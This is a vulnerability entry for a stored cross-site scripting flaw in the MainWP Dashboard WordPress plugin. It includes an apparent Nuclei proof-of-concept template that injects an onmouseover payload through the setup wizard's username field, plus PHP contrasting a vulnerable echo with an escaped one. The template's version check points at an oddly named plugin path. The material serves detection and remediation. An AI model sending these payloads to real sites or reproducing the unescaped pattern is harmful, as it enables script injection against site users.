MainWP Dashboard – The Private WordPress Manager for Multiple Website Maintenance plugin for WordPress, in versions up to 3.1.2, contains a stored cross-site scripting vulnerability caused by insufficient input sanitization and output escaping of the 'mwp_setup_purchase_username' parameter, letting unauthenticated attackers inject arbitrary scripts that execute when users access the affected pages.
PoC code [public]
id: CVE-2016-15041

info:
  name: MainWP Dashboard <= 3.1.2 - Stored Cross-Site Scripting
  author: flame
  severity: high
  description: |
    MainWP Dashboard – The Private WordPress Manager for Multiple Website Maintenance plugin for WordPress versions up to 3.1.2 contains a stored cross-site scripting caused by insufficient input sanitization and output escaping in 'mwp_setup_purchase_username' parameter, letting unauthenticated attackers inject and execute arbitrary scripts when users access affected pages.
  impact: |
    Unauthenticated attackers can inject scripts that execute in users' browsers, potentially leading to session hijacking, defacement, or redirection.
  remediation: |
    Update to the latest version of the plugin that addresses this vulnerability.
  reference:
    - https://klikki.fi/mainwp-admin-panel-unauthenticated-stored-xss/
  metadata:
    verified: true
    max-request: 4
    fofa-query: "/wp-content/plugins/mainwp/"
  tags: cve,cve2016,mainwp,wordpress,xss,wp,wp-plugin,vkev

variables:
  randstr: "{{rand_base(8)}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/mainwp-vuln/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - compare_versions(version, '<= 3.1.2')
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        name: version
        group: 1
        regex:
          - 'Stable tag: ([0-9.]+)'
        internal: true

  - raw:
      - |
        GET /wp-admin/admin-post.php?page=mainwp-setup&step=purchase_extension HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-admin/admin-post.php?page=mainwp-setup&step=purchase_extension&_wpnonce={{nonce}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        mwp_setup_purchase_username={{randstr}}"+onmouseover%3Dalert(document.domain)+x%3D"&mwp_setup_purchase_passwd=test&save_step=1

      - |
        GET /wp-admin/admin-post.php?page=mainwp-setup&step=purchase_extension HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: nonce
        part: body
        group: 1
        regex:
          - '_wpnonce" value="([a-zA-Z0-9]+)"'
        internal: true

    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - "MainWP"
          - "Setup Wizard"
          - "mwp_setup_purchase_username"
        condition: and

      - type: word
        part: body_3
        words:
          - ' onmouseover=alert(document.domain) x'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100be4a0aab8a0674178125439960de423fe5845f9adec80cfdf9bf84be930aa8de02202f2ac43ce1b67d7fef376c9c5c8dc34b468ca363bf61a204d88655e6613c92f0:922c64590222798bb761d5b6d8e72950
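As an added illustration that is not MainWP's code and not the vendor's actual fix, the following hypothetical setup-wizard handler shows the pattern the description names (an unsanitized value stored and then echoed raw into an HTML attribute) beside a hardened version; the function names, the option name and the nonce action are assumptions.

```php
<?php
// Hypothetical handler for the 'mwp_setup_purchase_username' field (added example).

// VULNERABLE PATTERN: the submitted value is stored as-is and later printed into
// an attribute without escaping, so a double quote in the stored value closes the
// attribute and whatever follows is parsed as new attributes (e.g. an event handler).
function mwp_demo_save_vulnerable() {
    if ( isset( $_POST['mwp_setup_purchase_username'] ) ) {
        update_option( 'mwp_setup_purchase_username', $_POST['mwp_setup_purchase_username'] );
    }
}
function mwp_demo_render_vulnerable() {
    $u = get_option( 'mwp_setup_purchase_username', '' );
    echo '<input type="text" name="mwp_setup_purchase_username" value="' . $u . '">';
}

// HARDENED PATTERN: require a capability (no unauthenticated writes), verify the
// nonce (no cross-site submission), sanitize on input, and escape for the attribute
// context on output. esc_attr() is the control that neutralizes the stored XSS;
// sanitize_text_field() strips tags but does not remove quotes, so it is not enough alone.
function mwp_demo_save_hardened() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    check_admin_referer( 'mwp_demo_setup_purchase' ); // nonce action name is an assumption
    if ( isset( $_POST['mwp_setup_purchase_username'] ) ) {
        $clean = sanitize_text_field( wp_unslash( $_POST['mwp_setup_purchase_username'] ) );
        update_option( 'mwp_setup_purchase_username', $clean );
    }
}
function mwp_demo_render_hardened() {
    $u = get_option( 'mwp_setup_purchase_username', '' );
    echo '<input type="text" name="mwp_setup_purchase_username" value="' . esc_attr( $u ) . '">';
}
```

With esc_attr() in place, a stored value containing `"` is emitted as `&quot;`, so the third request in the template above would no longer find the bare ` onmouseover=` string in the response body.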